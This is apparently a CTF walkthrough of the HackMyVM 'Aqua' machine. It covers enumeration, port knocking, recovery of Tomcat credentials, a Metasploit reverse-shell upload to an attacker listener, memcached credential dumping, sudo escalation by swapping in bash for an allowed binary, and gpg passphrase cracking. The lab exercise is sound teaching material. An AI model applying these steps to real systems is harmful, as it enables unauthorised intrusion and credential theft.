HackMyVM Aqua
Aqua by H1dr0 is classed as a medium difficulty machine buy the author.... but there are quite a few steps you need to take to get the initial foothold.
Find it
┌──(kali㉿kali)-[~/aqua]
└─$ sudo netdiscover -r 10.0.0.0/24 -P | tee findit
[sudo] password for kali:
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.0.0.1 08:00:27:4d:be:20 1 60 PCS Systemtechnik GmbH
10.0.0.53 08:00:27:8b:53:11 1 60 PCS Systemtechnik GmbH
-- Active scan completed, 2 Hosts found.
Enumerate it
┌──(kali㉿kali)-[~/aqua]
└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.53
Starting Nmap 7.91 ( https://nmap.org ) at Fri Mar 18 06:49:52 2022 EDT
Nmap scan report for 10.0.0.53
Host is up (0.00038s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 00:11:32:04:42:e0:7f:98:29:7c:1c:2a:b8:a7:b0:4a (RSA)
| 256 9c:92:93:eb:1c:8f:84:c8:73:af:ed:3b:65:09:e4:89 (ECDSA)
|_ 256 a8:5b:df:d0:7e:31:18:6e:57:e7:dd:6b:d5:89:44:98 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Todo sobre el Agua
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp open http Apache Tomcat 8.5.5
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat/8.5.5
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.07 seconds
┌──(kali㉿kali)-[~/aqua]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.53 -x txt,php -t 10 -o 80.out -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.0.0.53
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: txt,php
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2022/03/19 17:29:16 Starting gobuster in directory enumeration mode
===============================================================
/img (Status: 200) [Size: 929]
/css (Status: 200) [Size: 926]
/robots.txt (Status: 200) [Size: 33]
/server-status (Status: 403) [Size: 274]
===============================================================
┌──(kali㉿kali)-[~/aqua]
└─$ curl http://10.0.0.53/robots.txt
User-Agent: *
Disalow: /SuperCMS
┌──(kali㉿kali)-[~/aqua]
└─$ nikto -h http://10.0.0.53/SuperCMS
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.0.0.53
+ Target Hostname: 10.0.0.53
+ Target Port: 80
+ Start Time: 2022-03-20 17:59:38 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server may leak inodes via ETags, header found with file /SuperCMS/, inode: 31f, size: 5cd741201fdee, mtime: gzip
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3268: /SuperCMS/css/: Directory indexing found.
+ OSVDB-3092: /SuperCMS/css/: This might be interesting...
+ OSVDB-3268: /SuperCMS/img/: Directory indexing found.
+ OSVDB-3092: /SuperCMS/img/: This might be interesting...
+ /SuperCMS/login.html: Admin login page/section found.
+ OSVDB-3092: /SuperCMS/.git/index: Git Index file may contain directory listing information.
+ /SuperCMS/.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /SuperCMS/.git/config: Git config file found. Infos about repo details may be present.
+ 7889 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2022-03-20 18:00:39 (GMT-4) (61 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
So a there is a git repo that may be worth looking at - using GitTools to clone it.
https://github.com/internetwache/GitTools
After lots of messing about with git I eventually got it to work....
git show log extract
commit 58afe63a1cd28fa167b95bcff50d2f6f011337c1
Author: aquilino <hidro23@hotmail.com>
Date: Thu Jun 17 12:59:05 2021 +0200
Create knocking_on_Atlantis_door.txt
Las Puertas del avismo
┌──(kali㉿kali)-[~/aqua]
└─$ git show $(git rev-list --max-count=1 --all -- knocking_on_Atlantis_door.txt)^:knocking_on_Atlantis_door.txt
Para abrir las puertas esta es la secuencia
(☞゚ヮ゚)☞ 1100,800,666 ☜(゚ヮ゚☜)
Para abrir las puertas esta es la secuencia = To open the doors this is the sequence
It is also worth pointing out that nmap picks ports in a random order so for a 3 port sequence there is actually a 1 in 6 chance of hiting the ports in the correct order by chance! So I may explore that as a potential tool at sme point!
┌──(kali㉿kali)-[~/aqua]
└─$ knock 10.0.0.53 1100 800 666 -v
hitting tcp 10.0.0.53:1100
hitting tcp 10.0.0.53:800
hitting tcp 10.0.0.53:666
┌──(kali㉿kali)-[~/aqua]
└─$ nmap -T4 -p 21 10.0.0.53
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-20 18:01 EDT
Nmap scan report for 10.0.0.53
Host is up (0.00060s latency).
PORT STATE SERVICE
21/tcp open ftp
Nmap done: 1 IP address (1 host up) scanned in 0.23 seconds
So there is a hidden FTP folder with anonymous access where a zip file backup.zip can be downloaded.
This however is password protected and the password is not in rockyou.txt so there must be a hint to find.
Some hidden base64 text is at the end of the homepage...
<!-- MT0yID0gcGFzc3dvcmRfemlwCg== -->
┌──(kali㉿kali)-[~/aqua]
└─$ echo 'MT0yID0gcGFzc3dvcmRfemlwCg=='|base64 -d
1=2 = password_zip
1=2 = password_zip well thats not exactly clear. There is something on the homepage
┌──(kali㉿kali)-[~/aqua]
└─$ 7z x backup.zip -aoa -pagua=H2O
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-3740QM CPU @ 2.70GHz (306A9),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1250 bytes (2 KiB)
Extracting archive: backup.zip
--
Path = backup.zip
Type = zip
Physical Size = 1250
Everything is Ok
Size: 2326
Compressed: 1250
And we find a backup of the tomcat-users.xml that contains the admin credentials for tomcat on port 8080.
<user username="aquaMan" password="P4st#####" roles="manager-gui,admin-gui"/>
Getting Shell
This is a bit harder to screenshot so I may resort to just listing the commands... I used msfconsole
└─$ msfconsole
____________
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
[% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%]
[% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%]
[% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
[%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
=[ metasploit v6.1.4-dev ]
+ -- --=[ 2162 exploits - 1147 auxiliary - 367 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 8 evasion ]
Metasploit tip: View missing module options with show
missing
msf6 > use exploit/multi/http/tomcat_mgr_upload
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername aquaMan
HttpUsername => aquaMan
msf6 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword P4st****
HttpPassword => P4st3####
msf6 exploit(multi/http/tomcat_mgr_upload) > set RHOST 10.0.0.53
RHOST => 10.0.0.53
msf6 exploit(multi/http/tomcat_mgr_upload) > set RPORT 8080
RPORT => 8080
msf6 exploit(multi/http/tomcat_mgr_upload) > set LHOST 10.0.0.10
LHOST => 10.0.0.10
msf6 exploit(multi/http/tomcat_mgr_upload) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
4 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
5 payload/java/meterpreter/bind_tcp normal No Java Meterpreter, Java Bind TCP Stager
6 payload/java/meterpreter/reverse_http normal No Java Meterpreter, Java Reverse HTTP Stager
7 payload/java/meterpreter/reverse_https normal No Java Meterpreter, Java Reverse HTTPS Stager
8 payload/java/meterpreter/reverse_tcp normal No Java Meterpreter, Java Reverse TCP Stager
9 payload/java/shell/bind_tcp normal No Command Shell, Java Bind TCP Stager
10 payload/java/shell/reverse_tcp normal No Command Shell, Java Reverse TCP Stager
11 payload/java/shell_reverse_tcp normal No Java Command Shell, Reverse TCP Inline
12 payload/multi/meterpreter/reverse_http normal No Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
13 payload/multi/meterpreter/reverse_https normal No Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
msf6 exploit(multi/http/tomcat_mgr_upload) > set payload payload/java/shell_reverse_tcp
msf6 exploit(multi/http/tomcat_mgr_upload) > show options
Module options (exploit/multi/http/tomcat_mgr_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
HttpPassword P4st3lM4n no The password for the specified use
rname
HttpUsername aquaMan no The username to authenticate as
Proxies no A proxy chain of format type:host:
port[,type:host:port][...]
RHOSTS 10.0.0.53 yes The target host(s), see https://gi
thub.com/rapid7/metasploit-framewo
rk/wiki/Using-Metasploit
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing con
nections
TARGETURI /manager yes The URI path of the manager app (/
html/upload and /undeploy will be
used)
VHOST no HTTP server virtual host
Payload options (java/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.0.10 yes The listen address (an interface may be s
pecified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Java Universal
msf6 exploit(multi/http/tomcat_mgr_upload) > run
[*] Started reverse TCP handler on 10.0.0.10:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying BAjJ3Mp3l9LRnlG6AWvZHQ...
[*] Executing BAjJ3Mp3l9LRnlG6AWvZHQ...
[*] Undeploying BAjJ3Mp3l9LRnlG6AWvZHQ ...
[*] Command shell session 1 opened (10.0.0.10:4444 -> 10.0.0.53:40772) at 2022-03-21 17:09:44 -0400
id
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
hostname
Atlantis
Escalate to User
Linpeas is your friend on Aqua...
after quite a bit of looking around on my own linpeas.sh has a few clues... just showing the relevant parts of the output.
So as there is a memcach service running locally on port 11211 its easy enough to just telnet to it and have a look. I have coloured the typed commands in Green for readability.
telnet localhost 11211
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
stats items
STAT items:1:number 5
STAT items:1:number_hot 1
STAT items:1:number_warm 0
STAT items:1:number_cold 4
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 0
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 440
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 1162902
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 1
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 7
STAT items:1:hits_to_temp 0
END
stats cachedump 1 100
ITEM id [4 b; 0 s]
ITEM email [17 b; 0 s]
ITEM Name [14 b; 0 s]
ITEM password [18 b; 0 s]
ITEM username [8 b; 0 s]
END
get id
VALUE id 0 4
1221
END
get username
VALUE username 0 8
tridente
END
get password
VALUE password 0 18
N3ptun########
END
Escalate to Root
tridente@Atlantis:~$ sudo -l
[sudo] password for tridente:
Matching Defaults entries for tridente on Atlantis:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tridente may run the following commands on Atlantis:
(root) /home/tridente/find
tridente@Atlantis:~$ rm find
tridente@Atlantis:~$ cp /bin/bash ./find
tridente@Atlantis:~$ sudo /home/tridente/find -p
root@Atlantis:~#
Now we have root but cant read the root flag as it is gpg encrypted...
┌──(kali㉿kali)-[~/aqua]
└─$ gpg2john root.txt.gpg >gpghash
File root.txt.gpg
┌──(kali㉿kali)-[~/aqua]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt gpghash
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 41943040 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
arthur (?)
1g 0:00:03:04 DONE (2022-03-20 18:14) 0.005415g/s 7.755p/s 7.755c/s 7.755C/s arthur..12345a
Use the "--show" option to display all of the cracked passwords reliably
Session completed
So just need to decrypt the file and get the flag
root@Atlantis:/root# echo "arthur" | gpg --batch --passphrase-fd 0 --output root.txt --decrypt root.txt.gpg
gpg: WARNING: unsafe ownership on homedir '/home/tridente/.gnupg'
gpg: AES256 encrypted data
gpg: encrypted with 1 passphrase
root@Atlantis:/root# cat root.txt
Bien hecho Arthur eres el nuevo Rey de la Atlantida
flag -->###############################
root@Atlantis:/root
Root acquired and flags collected.
Comments
Post a Comment